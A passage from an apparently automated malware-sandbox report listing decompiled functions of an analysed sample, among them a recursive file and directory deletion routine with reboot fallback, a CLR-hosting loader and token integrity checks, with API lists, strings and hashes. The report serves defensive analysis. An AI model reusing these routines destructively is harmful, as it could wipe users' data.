				struct _WIN32_FIND_DATAW _v608;
				signed int _t40;
				signed int _t50;
				signed int* _t54;
				signed int _t58;
				signed int _t61;
				signed int _t69;
				signed int _t71;
				void* _t73;
				signed int _t76;
				signed int _t78;
				WCHAR* _t93;
				short* _t98;

				_t93 = _a4;
				_t40 = E004067AA(__eflags, _t93);
				_v16 = _t40;
				if((_a8 & 0x00000008) != 0) {
					_t71 = DeleteFileW(_t93); // executed
					asm("sbb eax, eax");
					_t73 =  ~_t71 + 1;
					 *0x47eb68 =  *0x47eb68 + _t73;
					return _t73;
				}
				_t76 = _a8 & 0x00000001;
				__eflags = _t76;
				_v8 = _t76;
				if(_t76 == 0) {
					L5:
					E00406035(0x467470, _t93);
					__eflags = _t76;
					if(_t76 == 0) {
						E0040677D(_t93);
					} else {
						lstrcatW(0x467470, L"\\*.*");
					}
					__eflags =  *_t93;
					if( *_t93 != 0) {
						L10:
						lstrcatW(_t93, "\\");
						L11:
						_v12 =  &(_t93[lstrlenW(_t93)]);
						_t40 = FindFirstFileW(0x467470,  &_v608); // executed
						_a4 = _t40;
						__eflags = _t40 - 0xffffffff;
						if(_t40 == 0xffffffff) {
							_t78 = 0;
							__eflags = 0;
							L30:
							__eflags = _v8 - _t78;
							if(_v8 != _t78) {
								_t40 = 0;
								__eflags = 0;
								 *((short*)(_v12 - 2)) = 0;
							}
							goto L32;
						} else {
							goto L12;
						}
						do {
							L12:
							_t98 =  &(_v608.cFileName);
							_t54 = E00405D32(_t98, 0x3f);
							_t78 = 0;
							__eflags =  *_t54;
							if( *_t54 != 0) {
								__eflags = _v608.cAlternateFileName;
								if(_v608.cAlternateFileName != 0) {
									_t98 =  &(_v608.cAlternateFileName);
								}
							}
							__eflags =  *_t98 - 0x2e;
							if( *_t98 != 0x2e) {
								L19:
								E00406035(_v12, _t98);
								__eflags = _v608.dwFileAttributes & 0x00000010;
								if((_v608.dwFileAttributes & 0x00000010) == 0) {
									E004062CF(L"Delete: DeleteFile(\"%s\")", _t93);
									E00405E5C(_t93);
									_t58 = DeleteFileW(_t93); // executed
									_push(_t93);
									__eflags = _t58;
									if(_t58 != 0) {
										_push(0xfffffff2);
										E00404F9E();
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											_push(L"Delete: DeleteFile failed(\"%s\")");
											E004062CF();
											 *0x47eb68 =  *0x47eb68 + 1;
										} else {
											_push(L"Delete: DeleteFile on Reboot(\"%s\")");
											E004062CF();
											E00404F9E(0xfffffff1, _t93);
											E00406C94(_t93, _t78);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00406CC7(__eflags, _t93, _a8);
									}
								}
								goto L27;
							}
							_t69 =  *(_t98 + 2) & 0x0000ffff;
							__eflags = _t69 - _t78;
							if(_t69 == _t78) {
								goto L27;
							}
							__eflags = _t69 - 0x2e;
							if(_t69 != 0x2e) {
								goto L19;
							}
							__eflags =  *((intOrPtr*)(_t98 + 4)) - _t78;
							if( *((intOrPtr*)(_t98 + 4)) == _t78) {
								goto L27;
							}
							goto L19;
							L27:
							_t61 = FindNextFileW(_a4,  &_v608); // executed
							__eflags = _t61;
						} while (_t61 != 0);
						_t40 = FindClose(_a4);
						goto L30;
					}
					__eflags =  *0x467470 - 0x5c;
					if( *0x467470 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L32:
						__eflags = _v8;
						if(_v8 == 0) {
							L42:
							return _t40;
						}
						_push(_t93);
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E00406301();
							__eflags = _t40;
							if(_t40 == 0) {
								goto L42;
							}
							E0040674E(_t93);
							E004062CF(L"RMDir: RemoveDirectory(\"%s\")", _t93);
							E00405E5C(_t93);
							_t50 = RemoveDirectoryW(_t93); // executed
							_push(_t93);
							__eflags = _t50;
							if(_t50 != 0) {
								_push(0xffffffe5);
								_t40 = E00404F9E();
								goto L42;
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								_push(L"RMDir: RemoveDirectory failed(\"%s\")");
								L40:
								_t40 = E004062CF();
								 *0x47eb68 =  *0x47eb68 + 1;
								goto L42;
							}
							_push(L"RMDir: RemoveDirectory on Reboot(\"%s\")");
							E004062CF();
							E00404F9E(0xfffffff1, _t93);
							_t40 = E00406C94(_t93, 0);
							goto L42;
						}
						_push(L"RMDir: RemoveDirectory invalid input(\"%s\")");
						goto L40;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L32;
					}
					goto L5;
				}
			}



















                                                                                                                                                    0x00406cd1
                                                                                                                                                    0x00406cd5
                                                                                                                                                    0x00406cde
                                                                                                                                                    0x00406ce1
                                                                                                                                                    0x00406ce4
                                                                                                                                                    0x00406cec
                                                                                                                                                    0x00406cee
                                                                                                                                                    0x00406cef
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406cef
                                                                                                                                                    0x00406cfe
                                                                                                                                                    0x00406cfe
                                                                                                                                                    0x00406d02
                                                                                                                                                    0x00406d05
                                                                                                                                                    0x00406d19
                                                                                                                                                    0x00406d20
                                                                                                                                                    0x00406d25
                                                                                                                                                    0x00406d2d
                                                                                                                                                    0x00406d3a
                                                                                                                                                    0x00406d2f
                                                                                                                                                    0x00406d35
                                                                                                                                                    0x00406d35
                                                                                                                                                    0x00406d3f
                                                                                                                                                    0x00406d43
                                                                                                                                                    0x00406d4f
                                                                                                                                                    0x00406d55
                                                                                                                                                    0x00406d57
                                                                                                                                                    0x00406d61
                                                                                                                                                    0x00406d6c
                                                                                                                                                    0x00406d72
                                                                                                                                                    0x00406d75
                                                                                                                                                    0x00406d78
                                                                                                                                                    0x00406e67
                                                                                                                                                    0x00406e67
                                                                                                                                                    0x00406e69
                                                                                                                                                    0x00406e69
                                                                                                                                                    0x00406e6c
                                                                                                                                                    0x00406e71
                                                                                                                                                    0x00406e71
                                                                                                                                                    0x00406e73
                                                                                                                                                    0x00406e73
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406d7e
                                                                                                                                                    0x00406d7e
                                                                                                                                                    0x00406d7e
                                                                                                                                                    0x00406d89
                                                                                                                                                    0x00406d8e
                                                                                                                                                    0x00406d90
                                                                                                                                                    0x00406d93
                                                                                                                                                    0x00406d95
                                                                                                                                                    0x00406d99
                                                                                                                                                    0x00406d9b
                                                                                                                                                    0x00406d9b
                                                                                                                                                    0x00406d99
                                                                                                                                                    0x00406d9e
                                                                                                                                                    0x00406da2
                                                                                                                                                    0x00406dc0
                                                                                                                                                    0x00406dc4
                                                                                                                                                    0x00406dc9
                                                                                                                                                    0x00406dd0
                                                                                                                                                    0x00406ded
                                                                                                                                                    0x00406df5
                                                                                                                                                    0x00406dfb
                                                                                                                                                    0x00406e01
                                                                                                                                                    0x00406e02
                                                                                                                                                    0x00406e04
                                                                                                                                                    0x00406e3d
                                                                                                                                                    0x00406e3f
                                                                                                                                                    0x00406e06
                                                                                                                                                    0x00406e06
                                                                                                                                                    0x00406e0a
                                                                                                                                                    0x00406e29
                                                                                                                                                    0x00406e2e
                                                                                                                                                    0x00406e33
                                                                                                                                                    0x00406e0c
                                                                                                                                                    0x00406e0c
                                                                                                                                                    0x00406e11
                                                                                                                                                    0x00406e1b
                                                                                                                                                    0x00406e22
                                                                                                                                                    0x00406e22
                                                                                                                                                    0x00406e0a
                                                                                                                                                    0x00406dd2
                                                                                                                                                    0x00406dd8
                                                                                                                                                    0x00406dda
                                                                                                                                                    0x00406de0
                                                                                                                                                    0x00406de0
                                                                                                                                                    0x00406dda
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406dd0
                                                                                                                                                    0x00406da4
                                                                                                                                                    0x00406da8
                                                                                                                                                    0x00406dab
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406db1
                                                                                                                                                    0x00406db4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406db6
                                                                                                                                                    0x00406dba
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406e44
                                                                                                                                                    0x00406e4e
                                                                                                                                                    0x00406e54
                                                                                                                                                    0x00406e54
                                                                                                                                                    0x00406e5f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406e5f
                                                                                                                                                    0x00406d45
                                                                                                                                                    0x00406d4d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406d07
                                                                                                                                                    0x00406d07
                                                                                                                                                    0x00406d09
                                                                                                                                                    0x00406e77
                                                                                                                                                    0x00406e79
                                                                                                                                                    0x00406e7c
                                                                                                                                                    0x00406ef7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406ef8
                                                                                                                                                    0x00406e7e
                                                                                                                                                    0x00406e7f
                                                                                                                                                    0x00406e82
                                                                                                                                                    0x00406e8b
                                                                                                                                                    0x00406e90
                                                                                                                                                    0x00406e92
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406e95
                                                                                                                                                    0x00406ea0
                                                                                                                                                    0x00406ea8
                                                                                                                                                    0x00406eae
                                                                                                                                                    0x00406eb4
                                                                                                                                                    0x00406eb5
                                                                                                                                                    0x00406eb7
                                                                                                                                                    0x00406ef0
                                                                                                                                                    0x00406ef2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406ef2
                                                                                                                                                    0x00406eb9
                                                                                                                                                    0x00406ebd
                                                                                                                                                    0x00406edc
                                                                                                                                                    0x00406ee1
                                                                                                                                                    0x00406ee1
                                                                                                                                                    0x00406ee6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406eed
                                                                                                                                                    0x00406ebf
                                                                                                                                                    0x00406ec4
                                                                                                                                                    0x00406ece
                                                                                                                                                    0x00406ed5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406ed5
                                                                                                                                                    0x00406e84
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406e84
                                                                                                                                                    0x00406d0f
                                                                                                                                                    0x00406d13
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406d13

                                                                                                                                                    APIs
                                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                    • lstrcatW.KERNEL32(00467470,\*.*), ref: 00406D35
                                                                                                                                                    • lstrcatW.KERNEL32(?,00409838), ref: 00406D55
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                    • FindFirstFileW.KERNELBASE(00467470,?), ref: 00406D6C
                                                                                                                                                    • FindNextFileW.KERNELBASE(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                    Strings
                                                                                                                                                    • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                    • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                    • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                    • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                    • ptF, xrefs: 00406D1A
                                                                                                                                                    • \*.*, xrefs: 00406D2F
                                                                                                                                                    • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                    • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                    • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                    • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                    • API String ID: 2035342205-1650287579
                                                                                                                                                    • Opcode ID: 0773e1bb02d94fce99ad1c6111755f8979c63676e37ea285c86d1b4844ce1413
                                                                                                                                                    • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                    • Opcode Fuzzy Hash: 0773e1bb02d94fce99ad1c6111755f8979c63676e37ea285c86d1b4844ce1413
                                                                                                                                                    • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6294C0, Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 165libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryW.KERNELBASE(mscoree.dll,3920FDCC,?,?,?,?,00000000,6E6813E5,000000FF,?,6E629450,00000000,6E69F8E0), ref: 6E6294F4
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,6E6813E5,000000FF,?,6E629450), ref: 6E629695
                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000040,C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp,?,?,?,?,00000000,6E6813E5,000000FF,?,6E629450,00000000), ref: 6E62952B
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorBindToRuntimeEx), ref: 6E629552
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,6E6813E5,000000FF,?,6E629450), ref: 6E629561
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,6E6813E5,000000FF,?,6E629450), ref: 6E62956E
                                                                                                                                                    • CorBindToRuntimeEx.MSCOREE(v4.0.30319,00000000,00000002,6E6915F4,6E691604,?,?,?,?,?,00000000,6E6813E5,000000FF,?,6E629450), ref: 6E6295D1
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,6E6813E5,000000FF,?,6E629450), ref: 6E629607
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,6E6813E5,000000FF,?,6E629450), ref: 6E6296E2
                                                                                                                                                    Strings
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6E629503
                                                                                                                                                    • mscoree.dll, xrefs: 6E6294EF
                                                                                                                                                    • v4.0.30319, xrefs: 6E6295CC
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6E62969B
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6E629574
                                                                                                                                                    • CorBindToRuntimeEx, xrefs: 6E629549
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6E62960D
                                                                                                                                                    • v2.0.50727, xrefs: 6E6295F2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$Free$ErrorLast$AddressBase::BindConcurrency::details::ContextIdentityLoadProcQueueRuntimeWork
                                                                                                                                                    • String ID: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$CorBindToRuntimeEx$mscoree.dll$v2.0.50727$v4.0.30319
                                                                                                                                                    • API String ID: 484818947-1696464217
                                                                                                                                                    • Opcode ID: e60ea0a50861de06113b9819ab4c54b0ed050bcdba38252f7c5fb436211c1fae
                                                                                                                                                    • Instruction ID: da3051fd82a7c75587f6907d9c676fcb0bbc68e91f4b752be5438dc872a8d3d1
                                                                                                                                                    • Opcode Fuzzy Hash: e60ea0a50861de06113b9819ab4c54b0ed050bcdba38252f7c5fb436211c1fae
                                                                                                                                                    • Instruction Fuzzy Hash: 6A61C3B4D00209EFDB04DFE4D954BAEBBB8BF49324F104A29E515AB380DB746A41CF65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E631660, Relevance: 25.6, APIs: 17, Instructions: 118threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6E631683
                                                                                                                                                    • OpenThreadToken.ADVAPI32(00000000), ref: 6E63168A
                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E631694
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 6E6316AE
                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 6E6316B5
                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 6E6316D4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Token$CurrentOpenProcessThread$ErrorInformationLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 632756016-0
                                                                                                                                                    • Opcode ID: a1fa401e34e9b67d1f0de877bb8e29a6415c6cd1e92ddc218b04f9c3090da9b2
                                                                                                                                                    • Instruction ID: 9f7af6b4cc7c7e2bcdf068dd26fad2af3b1d800ed8f1ff1459f7234f140bd712
                                                                                                                                                    • Opcode Fuzzy Hash: a1fa401e34e9b67d1f0de877bb8e29a6415c6cd1e92ddc218b04f9c3090da9b2
                                                                                                                                                    • Instruction Fuzzy Hash: 64411B74A40615FFDB44DBE5C858BAF7BB8FB4B701F649958E102E6280DB709A48CB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E651C23, Relevance: 10.6, APIs: 7, Instructions: 140fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 6E651C2D
                                                                                                                                                    • PathIsUNCW.SHLWAPI(?,?,?,00000000), ref: 6E651CE3
                                                                                                                                                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6E651D07
                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00000104,00000040,?,00000268,6E651850,?,00000040,?,00000040,00000104,00000000), ref: 6E651C60
                                                                                                                                                      • Part of subcall function 6E651BE1: GetLastError.KERNEL32(6E62C43F,?,?,6E651D18,6E62C43F,?), ref: 6E651BED
                                                                                                                                                      • Part of subcall function 6E651497: PathStripToRootW.SHLWAPI(00000000,?,6E651CDC,?,?,00000000), ref: 6E6514CB
                                                                                                                                                    • CharUpperW.USER32(?), ref: 6E651D35
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 6E651D4D
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 6E651D59
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Path$Find$CharCloseErrorFileFirstFullH_prolog3_InformationLastNameRootStripUpperVolume
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2323451338-0
                                                                                                                                                    • Opcode ID: 48727d60d1c8433cfc0a3dee84818242181a3dfd17adead1f5bb84319ba1f072
                                                                                                                                                    • Instruction ID: 026e2fa9c83eadb67461f274c7e5431e5acf156ca14c82e0106245557129e2a9
                                                                                                                                                    • Opcode Fuzzy Hash: 48727d60d1c8433cfc0a3dee84818242181a3dfd17adead1f5bb84319ba1f072
                                                                                                                                                    • Instruction Fuzzy Hash: E1418571614915AFEB509FE4CC98EEF737DEF02318F100BA5E45992240EB35AE588E20
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E677DBD, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,6E68BAA0), ref: 6E677E27
                                                                                                                                                    • _free.LIBCMT ref: 6E677E15
                                                                                                                                                      • Part of subcall function 6E67391E: HeapFree.KERNEL32(00000000,00000000,?,6E67B527,?,00000000,?,?,?,6E67B54E,?,00000007,?,?,6E679B53,?), ref: 6E673934
                                                                                                                                                      • Part of subcall function 6E67391E: GetLastError.KERNEL32(?,?,6E67B527,?,00000000,?,?,?,6E67B54E,?,00000007,?,?,6E679B53,?,?), ref: 6E673946
                                                                                                                                                    • _free.LIBCMT ref: 6E677FE1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                    • String ID: Pacific Daylight Time$Pacific Standard Time
                                                                                                                                                    • API String ID: 2155170405-1154798116
                                                                                                                                                    • Opcode ID: c65c0393416a7a5a962c7b8bebd03848b564d2d2e6a6c9d2592b028507e729fd
                                                                                                                                                    • Instruction ID: 294990c2dcfeb2c804f775a012358726f7d959a8d23aa08010e5caeeefc4623a
                                                                                                                                                    • Opcode Fuzzy Hash: c65c0393416a7a5a962c7b8bebd03848b564d2d2e6a6c9d2592b028507e729fd
                                                                                                                                                    • Instruction Fuzzy Hash: 5E51B97190421AEBDF20DFF98D409EA7BBCEF42355B21055AE460E72D1EB70AE40CB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406301, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00406301(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x466a20); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x466a20;
			}




                                                                                                                                                    0x0040630c
                                                                                                                                                    0x00406315
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406322
                                                                                                                                                    0x00406318
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                    • String ID: jF
                                                                                                                                                    • API String ID: 2295610775-3349280890
                                                                                                                                                    • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                    • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                    • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                    • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406328, Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00406328(signed int _a4) {
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				signed int _t9;

				_t9 = _a4;
				_t8 =  *(0x40c060 + _t9 * 8);
				_t6 = GetModuleHandleA(_t8);
				if(_t6 != 0) {
					L2:
					return GetProcAddress(_t6,  *(0x40c064 + _t9 * 8));
				}
				_t6 = LoadLibraryA(_t8); // executed
				if(_t6 != 0) {
					goto L2;
				}
				return _t6;
			}






                                                                                                                                                    0x00406329
                                                                                                                                                    0x0040632e
                                                                                                                                                    0x00406336
                                                                                                                                                    0x0040633e
                                                                                                                                                    0x0040634b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406353
                                                                                                                                                    0x00406341
                                                                                                                                                    0x00406349
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040635b

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
